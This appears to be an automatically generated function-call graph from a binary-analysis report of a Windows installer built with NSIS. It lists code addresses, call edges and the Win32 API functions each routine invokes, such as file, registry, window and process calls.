404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 